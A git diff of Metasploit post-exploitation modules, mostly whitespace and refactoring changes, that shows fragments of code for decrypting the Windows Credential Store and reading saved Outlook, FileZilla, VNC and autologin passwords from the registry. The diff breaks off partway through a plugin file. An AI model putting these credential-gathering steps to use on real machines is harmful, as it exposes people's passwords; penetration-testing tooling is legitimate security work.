+++ b/modules/post/windows/gather/credentials/enum_cred_store.rb
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Post
'Description' => %q{
This module will enumerate the Microsoft Credential Store and decrypt the
credentials. This module can only access credentials created by the user the
- process is running as. It cannot decrypt Domain Network Passwords, but will
+ process is running as. It cannot decrypt Domain Network Passwords, but will
display the username and location.
},
'License' => MSF_LICENSE,
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Post
end
return str_data || "Error Decrypting"
end
-
+
def decrypt_blob(daddr, dlen, type)
#type 0 = passport cred, type 1 = wininet cred
#set up entropy
@@ -112,7 +112,7 @@ class Metasploit3 < Msf::Post
def gethost(hostorip)
#check for valid ip and return if it is
- return hostorip if Rex::Socket.dotted_ip?(hostorip)
+ return hostorip if Rex::Socket.dotted_ip?(hostorip)
#convert hostname to ip and return it
hostip = nil
@@ -159,7 +159,7 @@ class Metasploit3 < Msf::Post
ip_add= gethost(host)
- unless ip_add.nil?
+ unless ip_add.nil?
auth = {
:host => ip_add,
:port => port,
@@ -185,10 +185,10 @@ class Metasploit3 < Msf::Post
#call credenumerate to get the ptr needed
adv32 = session.railgun.advapi32
ret = adv32.CredEnumerateA(nil,0,4,4)
- p_to_arr = ret["Credentials"].unpack("V")
+ p_to_arr = ret["Credentials"].unpack("V")
arr_len = ret["Count"] * 4 if is_86
arr_len = ret["Count"] * 8 unless is_86
-
+
#tell user what's going on
print_status("#{ret["Count"]} credentials found in the Credential Store")
if ret["Count"] > 0
diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb
index 81dba96cea..c4ca4059b5 100644
--- a/modules/post/windows/gather/credentials/filezilla_server.rb
+++ b/modules/post/windows/gather/credentials/filezilla_server.rb
@@ -140,8 +140,10 @@ class Metasploit3 < Msf::Post
end
file.close
- creds, perms, config = parse_server(fs_xml) # user credentials password is just an MD5 hash
- # admin pass is just plain text. Priorities?
+ # user credentials password is just an MD5 hash
+ # admin pass is just plain text. Priorities?
+ creds, perms, config = parse_server(fs_xml)
+
creds.each do |cred|
credentials << [cred['host'], cred['port'], cred['user'], cred['password'], cred['ssl']]
diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb
index cf5202c019..d9d1f99c61 100644
--- a/modules/post/windows/gather/credentials/outlook.rb
+++ b/modules/post/windows/gather/credentials/outlook.rb
@@ -82,21 +82,27 @@ class Metasploit3 < Msf::Post
return decrypted_pw
end
+ # Just a wrapper to avoid copy pasta and long lines
+ def get_valdata(k, name)
+ key_base = "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
+ registry_getvaldata("#{key_base}\\#{k}", name)
+ end
def get_registry
#Determine if saved accounts exist within Outlook. Ignore the Address Book and Personal Folder registry entries.
outlook_exists = 0
saved_accounts = 0
- next_account_id = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\", 'NextAccountID')
+
+ next_account_id = get_valdata("", 'NextAccountID')
if next_account_id != nil
#Microsoft Outlook not found
print_status "Microsoft Outlook found in Registry..."
outlook_exists = 1
- registry_enumkeys("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\").each do |k|
- display_name = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Display Name')
+ registry_enumkeys(key_base + "9375CFF0413111d3B88A00104B2A6676\\").each do |k|
+ display_name = get_valdata(k, 'Display Name')
if display_name == nil
#Microsoft Outlook found, but no account data saved in this location
@@ -106,17 +112,17 @@ class Metasploit3 < Msf::Post
#Account found - parse through registry data to determine account type. Parse remaining registry data after to speed up module.
saved_accounts = 1
got_user_pw = 0
- accountname = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Account Name')
- displayname = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Display Name')
- email = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Email')
- pop3_server = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Server')
- smtp_server = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Server')
- http_server_url = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP Server URL')
- imap_server = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Server')
- smtp_use_auth = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Use Auth')
+ accountname = get_valdata(k, 'Account Name')
+ displayname = get_valdata(k, 'Display Name')
+ email = get_valdata(k, 'Email')
+ pop3_server = get_valdata(k, 'POP3 Server')
+ smtp_server = get_valdata(k, 'SMTP Server')
+ http_server_url = get_valdata(k, 'HTTP Server URL')
+ imap_server = get_valdata(k, 'IMAP Server')
+ smtp_use_auth = get_valdata(k, 'SMTP Use Auth')
if smtp_use_auth != nil
- smtp_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP User')
- smtp_password = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Password')
+ smtp_user = get_valdata(k, 'SMTP User')
+ smtp_password = get_valdata(k, 'SMTP Password')
end
if pop3_server != nil
@@ -136,10 +142,10 @@ class Metasploit3 < Msf::Post
print_status(" User E-mail Address: #{email}")
if type == "POP3"
- pop3_pw = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Password')
- pop3_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 User')
- pop3_use_spa = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Use SPA')
- smtp_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Port')
+ pop3_pw = get_valdata(k, 'POP3 Password')
+ pop3_user = get_valdata(k, 'POP3 User')
+ pop3_use_spa = get_valdata(k, 'POP3 Use SPA')
+ smtp_port = get_valdata(k, 'SMTP Port')
print_status(" User Name: #{pop3_user}")
if pop3_pw == nil
@@ -160,14 +166,14 @@ class Metasploit3 < Msf::Post
print_status(" Incoming Mail Server (POP3): #{pop3_server}")
- pop3_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Use SSL')
+ pop3_use_ssl = get_valdata(k, 'POP3 Use SSL')
if pop3_use_ssl == nil
print_status(" POP3 Use SSL: No")
else
print_status(" POP3 Use SSL: Yes")
end
- pop3_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Port')
+ pop3_port = get_valdata(k, 'POP3 Port')
if pop3_port == nil
print_status(" POP3 Port: 110")
portnum = 110
@@ -186,7 +192,7 @@ class Metasploit3 < Msf::Post
print_status(" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}")
end
- smtp_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Use SSL')
+ smtp_use_ssl = get_valdata(k, 'SMTP Use SSL')
if smtp_use_ssl == nil
print_status(" SMTP Use SSL: No")
else
@@ -201,9 +207,9 @@ class Metasploit3 < Msf::Post
end
elsif type == "HTTP"
- http_password = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP Password')
- http_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP User')
- http_use_spa = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP Use SPA')
+ http_password = get_valdata(k, 'HTTP Password')
+ http_user = get_valdata(k, 'HTTP User')
+ http_use_spa = get_valdata(k, 'HTTP Use SPA')
print_status(" User Name: #{http_user}")
if http_password == nil
@@ -232,10 +238,10 @@ class Metasploit3 < Msf::Post
print_status(" HTTP Server URL: #{http_server_url}")
elsif type == "IMAP"
- imap_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP User')
- imap_use_spa = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Use SPA')
- imap_password = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Password')
- smtp_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Port')
+ imap_user = get_valdata(k, 'IMAP User')
+ imap_use_spa = get_valdata(k, 'IMAP Use SPA')
+ imap_password = get_valdata(k, 'IMAP Password')
+ smtp_port = get_valdata(k, 'SMTP Port')
print_status(" User Name: #{imap_user}")
if imap_password == nil
@@ -255,14 +261,14 @@ class Metasploit3 < Msf::Post
print_status(" Incoming Mail Server (IMAP): #{imap_server}")
- imap_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Use SSL')
+ imap_use_ssl = get_valdata(k, 'IMAP Use SSL')
if imap_use_ssl == nil
print_status(" IMAP Use SSL: No")
else
print_status(" IMAP Use SSL: Yes")
end
- imap_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Port')
+ imap_port = get_valdata(k, 'IMAP Port')
if imap_port == nil
print_status(" IMAP Port: 143")
portnum = 143
@@ -281,7 +287,7 @@ class Metasploit3 < Msf::Post
print_status(" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}")
end
- smtp_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Use SSL')
+ smtp_use_ssl = get_valdata(k, 'SMTP Use SSL')
if smtp_use_ssl == nil
print_status(" SMTP Use SSL: No")
else
diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb
index c63a83422b..b5781a85ac 100644
--- a/modules/post/windows/gather/credentials/vnc.rb
+++ b/modules/post/windows/gather/credentials/vnc.rb
@@ -86,20 +86,20 @@ class Metasploit3 < Msf::Post
def run
- '''
- Hash format
- :name,
- :check_file,
- :check_reg,
- :pass_variable,
- :port_variable,
- :port,
- :hash,
- :pass,
- :viewonly_variable,
- :viewonly_hash,
- :viewonly_pass
- '''
+ '''
+ Hash format
+ :name,
+ :check_file,
+ :check_reg,
+ :pass_variable,
+ :port_variable,
+ :port,
+ :hash,
+ :pass,
+ :viewonly_variable,
+ :viewonly_hash,
+ :viewonly_pass
+ '''
locations = []
diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb
index 60c3db0ead..cca0dd5480 100644
--- a/modules/post/windows/gather/credentials/windows_autologin.rb
+++ b/modules/post/windows/gather/credentials/windows_autologin.rb
@@ -53,14 +53,13 @@ class Metasploit3 < Msf::Post
creds = Rex::Ui::Text::Table.new(
'Header' => 'Windows AutoLogin Password',
'Ident' => 1,
- 'Columns' =>
- [
+ 'Columns' => [
'Domain',
'UserName',
'Password'
]
)
-
+
has_al = 0
# DefaultDomainName, DefaultUserName, DefaultPassword
diff --git a/modules/post/windows/gather/dumplinks.rb b/modules/post/windows/gather/dumplinks.rb
index 9900cd26e5..54dde5f77c 100644
--- a/modules/post/windows/gather/dumplinks.rb
+++ b/modules/post/windows/gather/dumplinks.rb
@@ -157,8 +157,8 @@ class Metasploit3 < Msf::Post
lvt['name'] = lnk_file.sysread(lvt['len'] - 0x10)
@data_out += "\t\tVolume Name = #{lvt['name']}\n" +
- "\t\tVolume Type = #{get_vol_type(lvt['type'])}\n" +
- "\t\tVolume SN = 0x%X" % lvt['vol_sn'] + "\n"
+ "\t\tVolume Type = #{get_vol_type(lvt['type'])}\n" +
+ "\t\tVolume SN = 0x%X" % lvt['vol_sn'] + "\n"
end
diff --git a/modules/post/windows/gather/enum_dirperms.rb b/modules/post/windows/gather/enum_dirperms.rb
index d0bc9ad801..2e853635fa 100644
--- a/modules/post/windows/gather/enum_dirperms.rb
+++ b/modules/post/windows/gather/enum_dirperms.rb
@@ -46,11 +46,11 @@ class Metasploit3 < Msf::Post
#p = kern.GetCurrentProcess() #get handle to current process
pid = session.sys.process.open.pid
pr = session.sys.process.open(pid, PROCESS_ALL_ACCESS)
- pt = adv.OpenProcessToken(pr.handle, tok_all, 4) #get handle to primary token
+ pt = adv.OpenProcessToken(pr.handle, tok_all, 4) #get handle to primary token
it = adv.DuplicateToken(pt["TokenHandle"],2, 4) # get an impersonation token
if it["return"] #if it fails return 0 for error handling
return it["DuplicateTokenHandle"]
- else
+ else
return 0
end
end
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Post
gen_map = [0,0,0,0]
gen_map = gen_map.pack("L")
- #get Security Descriptor for the directory
+ #get Security Descriptor for the directory
f = adv.GetFileSecurityA(dir, si, 20, 20, 4)
f = adv.GetFileSecurityA(dir, si, f["lpnLengthNeeded"], f["lpnLengthNeeded"], 4)
sd = f["pSecurityDescriptor"]
@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Post
next if d =~ /^(\.|\.\.)$/
realpath = dpath + '\\' + d
if session.fs.file.stat(realpath).directory?
- perm = check_dir(realpath, token)
+ perm = check_dir(realpath, token)
if !filter or perm.include? filter
print_status(perm + "\t" + realpath)
end
@@ -120,7 +120,7 @@ class Metasploit3 < Msf::Post
#get impersonation token
print_status("Getting impersonation token...")
t = get_imperstoken()
-
+
#loop through sub dirs if we have an impers token..else error
if t == 0
print_error("Getting impersonation token failed")
diff --git a/modules/post/windows/gather/enum_ms_product_keys.rb b/modules/post/windows/gather/enum_ms_product_keys.rb
index 3074efeeae..40aac09849 100644
--- a/modules/post/windows/gather/enum_ms_product_keys.rb
+++ b/modules/post/windows/gather/enum_ms_product_keys.rb
@@ -41,23 +41,24 @@ class Metasploit3 < Msf::Post
"License Key"
])
- keys = [["HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId"],
- ["HKLM\\SOFTWARE\\Microsoft\\Office\\11.0\\Registration\\{91110409-6000-11D3-8CFE-0150048383C9}", "DigitalProductId"],
- ["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-00CA-0000-0000-0000000FF1CE}", "DigitalProductId"],
- ["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0014-0000-0000-0000000FF1CE}", "DigitalProductId"],
- ["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0051-0000-0000-0000000FF1CE}", "DigitalProductId"],
- ["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0053-0000-0000-0000000FF1CE}", "DigitalProductId"],
- ["HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\100\\Tools\\Setup", "DigitalProductId"],
- ["HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77654"],
- ["HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77574"],
- ["HKLM\\SOFTWARE\\Microsoft\\Exchange\\Setup", "DigitalProductId"],
- ]
+ keys = [
+ [ "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId" ],
+ [ "HKLM\\SOFTWARE\\Microsoft\\Office\\11.0\\Registration\\{91110409-6000-11D3-8CFE-0150048383C9}", "DigitalProductId" ],
+ [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-00CA-0000-0000-0000000FF1CE}", "DigitalProductId" ],
+ [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0014-0000-0000-0000000FF1CE}", "DigitalProductId" ],
+ [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0051-0000-0000-0000000FF1CE}", "DigitalProductId" ],
+ [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0053-0000-0000-0000000FF1CE}", "DigitalProductId" ],
+ [ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\100\\Tools\\Setup", "DigitalProductId" ],
+ [ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77654" ],
+ [ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77574" ],
+ [ "HKLM\\SOFTWARE\\Microsoft\\Exchange\\Setup", "DigitalProductId" ],
+ ]
keys.each do |keyx86|
-
+
#parent key
p = keyx86[0,1].join
-
+
#child key
c = keyx86[1,1].join
@@ -122,7 +123,7 @@ class Metasploit3 < Msf::Post
(string_length-1).downto(0) do |s|
t = ((mindex << 8) & 0xffffffff) | product_id[s]
- product_id[s] = t / 24
+ product_id[s] = t / 24
mindex = t % 24
end
diff --git a/modules/post/windows/gather/memory_grep.rb b/modules/post/windows/gather/memory_grep.rb
index 997256a854..d1483e041e 100644
--- a/modules/post/windows/gather/memory_grep.rb
+++ b/modules/post/windows/gather/memory_grep.rb
@@ -17,20 +17,19 @@ class Metasploit3 < Msf::Post
super( update_info(info,
'Name' => 'Windows Gather Process Memory Grep',
'Description' => %q{
- This module allows for searching the memory space of a proccess for potentially sensitive
- data.
- },
+ This module allows for searching the memory space of a proccess for potentially sensitive
+ data.
+ },
'License' => MSF_LICENSE,
'Author' => ['bannedit'],
'Version' => '$Revision$',
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter' ]
))
- register_options(
- [
- OptString.new('PROCESS', [true, 'Name of the process to dump memory from', nil]),
- OptString.new('REGEX', [true, 'Regular expression to search for with in memory', nil]),
- ], self.class)
+ register_options([
+ OptString.new('PROCESS', [true, 'Name of the process to dump memory from', nil]),
+ OptString.new('REGEX', [true, 'Regular expression to search for with in memory', nil]),
+ ], self.class)
end
def run
diff --git a/modules/post/windows/gather/reverse_lookup.rb b/modules/post/windows/gather/reverse_lookup.rb
index ce87662f21..c03925e4f6 100644
--- a/modules/post/windows/gather/reverse_lookup.rb
+++ b/modules/post/windows/gather/reverse_lookup.rb
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => "Windows Gather IP Range Reverse Lookup",
- 'Description' => %q{
+ 'Description' => %q{
This module uses Railgun, calling the gethostbyaddr function to resolve a hostname
to an IP.
},
@@ -34,12 +34,12 @@ class Metasploit3 < Msf::Post
], self.class)
end
-
+
def run
-
- #Add ws2_32 just in case it isn't there...
+
+ #Add ws2_32 just in case it isn't there...
session.railgun.ws2_32
-
+
#Check if gethostbyaddr is available to us
modhandle = session.railgun.kernel32.GetModuleHandleA('ws2_32.dll')
if modhandle['return'] == 0
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Post
return
end
end
-
+
#Initialize Railgun 'gethostbyaddr' call'
session.railgun.add_function('ws2_32', 'gethostbyaddr', 'DWORD', [
['PCHAR', 'addr', 'in'],
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Post
iplist.each do |x|
#Converts an IP in string formate to network byte order format
nbi = Rex::Socket.addr_aton(x)
-
+
#Call gethostbyaddr
result = session.railgun.ws2_32.gethostbyaddr(nbi.to_s,nbi.size,2)
if result['return'] == 0
diff --git a/modules/post/windows/gather/usb_history.rb b/modules/post/windows/gather/usb_history.rb
index 957f608bd6..7399852c33 100644
--- a/modules/post/windows/gather/usb_history.rb
+++ b/modules/post/windows/gather/usb_history.rb
@@ -85,10 +85,10 @@ class Metasploit3 < Msf::Post
if isadmin
mace = registry_getkeylastwritetime('HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceClasses\\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\' << guid)
if mace
- keytime = ::Time.at(mace)
- else
- keytime = "Unknown"
- end
+ keytime = ::Time.at(mace)
+ else
+ keytime = "Unknown"
+ end
out << sprintf("%25s\t%50s\n", "Volume lpftLastWriteTime", keytime)
end
print_status(info_hash_to_str(out, v))
diff --git a/modules/post/windows/manage/autoroute.rb b/modules/post/windows/manage/autoroute.rb
index e8d1f2dc55..f25657310a 100644
--- a/modules/post/windows/manage/autoroute.rb
+++ b/modules/post/windows/manage/autoroute.rb
@@ -101,14 +101,12 @@ class Metasploit3 < Msf::Post
'Header' => "Active Routing Table",
'Prefix' => "\n",
'Postfix' => "\n",
- 'Columns' =>
- [
+ 'Columns' => [
'Subnet',
'Netmask',
'Gateway',
],
- 'ColProps' =>
- {
+ 'ColProps' => {
'Subnet' => { 'MaxWidth' => 17 },
'Netmask' => { 'MaxWidth' => 17 },
})
diff --git a/modules/post/windows/manage/delete_user.rb b/modules/post/windows/manage/delete_user.rb
index b357d59f0d..8df6b6bb1d 100644
--- a/modules/post/windows/manage/delete_user.rb
+++ b/modules/post/windows/manage/delete_user.rb
@@ -19,8 +19,10 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Local User Account Deletion',
- 'Description' => %q{ This module deletes a local user account from the specified server,
- or the local machine if no server is given.},
+ 'Description' => %q{
+ This module deletes a local user account from the specified server,
+ or the local machine if no server is given.
+ },
'License' => MSF_LICENSE,
'Author' => [ 'chao-mu'],
'Version' => '$Revision$',
diff --git a/plugins/db_credcollect.rb b/plugins/db_credcollect.rb
index fdff784218..6c23c5e613 100644
--- a/plugins/db_credcollect.rb
+++ b/plugins/db_credcollect.rb
@@ -57,8 +57,8 @@ class Plugin::CredCollect < Msf::Plugin
# Target infos for the db record
addr = session.sock.peerhost
# This ought to read from the exploit's datastore.
- # Use the meterpreter script if you need to control it.
- smb_port = 445
+ # Use the meterpreter script if you need to control it.
+ smb_port = 445
# Record hashes to the running db instance
hashes.each do |hash|
diff --git a/plugins/ips_filter.rb b/plugins/ips_filter.rb
index 7b4035bd46..5efa06e46c 100644
--- a/plugins/ips_filter.rb
+++ b/plugins/ips_filter.rb
@@ -68,7 +68,7 @@ module SocketTracer
# Hook the write method
def write(buf, opts = {})
if (ips_match(buf))
- $stderr.puts "*** Outbound write blocked due to possible signature match"
+ print_error "Outbound write blocked due to possible signature match"
return 0
end
super(buf, opts)
@@ -78,7 +78,7 @@ module SocketTracer
def read(length = nil, opts = {})
r = super(length, opts)
if (ips_match(r))
- $stderr.puts "*** Incoming read may match a known signature"
+ print_error "Incoming read may match a known signature"
end
return r
end
@@ -95,11 +95,11 @@ module SocketTracer
begin
r = Regexp.new(s[1])
if (data.match(r))
- $stderr.puts "*** Matched IPS signature #{s[0]}"
+ print_error "Matched IPS signature #{s[0]}"
return true
end
rescue ::Exception => e
- $stderr.puts "*** Compiled error: #{s[1]}"
+ print_error "Compiled error: #{s[1]}"
end
end
diff --git a/plugins/lab.rb b/plugins/lab.rb
index 6c5054ed7d..60e3f8b7ed 100644
--- a/plugins/lab.rb
+++ b/plugins/lab.rb
@@ -1,5 +1,6 @@
##
-## $Id$
+# $Id$
+# $Revision$
##
$:.unshift(File.join(File.expand_path(File.dirname(__FILE__)), '..', 'lib', 'lab'))
@@ -14,7 +15,7 @@ class Plugin::Lab < Msf::Plugin
include Msf::Ui::Console::CommandDispatcher
attr_accessor :controller
-
+
def initialize(driver)
super(driver)
@controller = nil
@@ -28,12 +29,12 @@ class Plugin::Lab < Msf::Plugin
"lab_help" => "lab_help - Show that command's description.",
"lab_show" => "lab_show - show all vms in the lab.",
"lab_show_running" => "lab_show_running - show running vms.",
- "lab_load" => "lab_load [file] - load a lab definition from disk.",
+ "lab_load" => "lab_load [file] - load a lab definition from disk.",
"lab_save" => "lab_save [filename] - persist a lab definition in a file.",
- "lab_load_running" => "lab_load_running [type] [user] [host] - use the running vms to create a lab.",
- "lab_load_config" => "lab_load_config [type] [user] [host] - use the vms in the config to create a lab.",
+ "lab_load_running" => "lab_load_running [type] [user] [host] - use the running vms to create a lab.",
+ "lab_load_config" => "lab_load_config [type] [user] [host] - use the vms in the config to create a lab.",
"lab_load_dir" => "lab_load_dir [type] [directory] - create a lab from a specified directory.",
- "lab_clear" => "lab_clear - clear the running lab.",
+ "lab_clear" => "lab_clear - clear the running lab.",
"lab_start" => "lab_start [vmid+|all] start the specified vm.",
"lab_reset" => "lab_reset [vmid+|all] reset the specified vm.",
"lab_suspend" => "lab_suspend [vmid+|all] suspend the specified vm.",
@@ -48,60 +49,60 @@ class Plugin::Lab < Msf::Plugin
def name
"Lab"
end
-
+
##
## Regular Lab Commands
- ##
+ ##
def cmd_lab_load(*args)
- return lab_usage unless args.count == 1
+ return lab_usage unless args.count == 1
@controller.from_file(args[0])
end
def cmd_lab_load_running(*args)
return lab_usage if args.empty?
-
+
if args[0] =~ /^remote_/
- return lab_usage unless args.count == 3
+ return lab_usage unless args.count == 3
## Expect a username & password
@controller.build_from_running(args[0], args[1], args[2])
else
- return lab_usage unless args.count == 1
+ return lab_usage unless args.count == 1
@controller.build_from_running(args[0])
end
end
def cmd_lab_load_config(*args)
return lab_usage if args.empty?
-
+
if args[0] =~ /^remote_/
- return lab_usage unless args.count == 3
+ return lab_usage unless args.count == 3
## Expect a username & password
@controller.build_from_config(args[0], args[1], args[2])
else
- return lab_usage unless args.count == 1
+ return lab_usage unless args.count == 1
@controller.build_from_config(args[0])
end
end
- def cmd_lab_load_dir(*args)
+ def cmd_lab_load_dir(*args)
return lab_usage unless args.count == 2
@controller.build_from_dir(args[0],args[1],true)
end
def cmd_lab_clear(*args)
@controller.clear!
- end
+ end
- def cmd_lab_save(*args)
+ def cmd_lab_save(*args)
return lab_usage if args.empty?
@controller.to_file(args[0])
end
-
- ##
+
+ ##
## Commands for dealing with a currently-loaded lab
- ##
+ ##
def cmd_lab_show(*args)
if args.empty?
@@ -112,72 +113,72 @@ class Plugin::Lab < Msf::Plugin
print_line @controller[vmid].to_yaml
else
print_error "Unknown vm '#{vmid}'"
- end
- end
- end
- end
-
- def cmd_lab_show_running(*args)
- hlp_print_lab_running
- end
-
- def cmd_lab_start(*args)
- return lab_usage if args.empty?
-
- if args[0] == "all"
- @controller.each do |vm|
- print_line "Starting lab vm #{vm.vmid}."
- if !vm.running?
- vm.start
- else
- print_line "Lab vm #{vm.vmid} already running."
end
end
- else
- args.each do |arg|
- if @controller.includes_vmid? arg
- vm = @controller.find_by_vmid(arg)
- if !vm.running?
- print_line "Starting lab vm #{vm.vmid}."
- vm.start
- else
- print_line "Lab vm #{vm.vmid} already running."
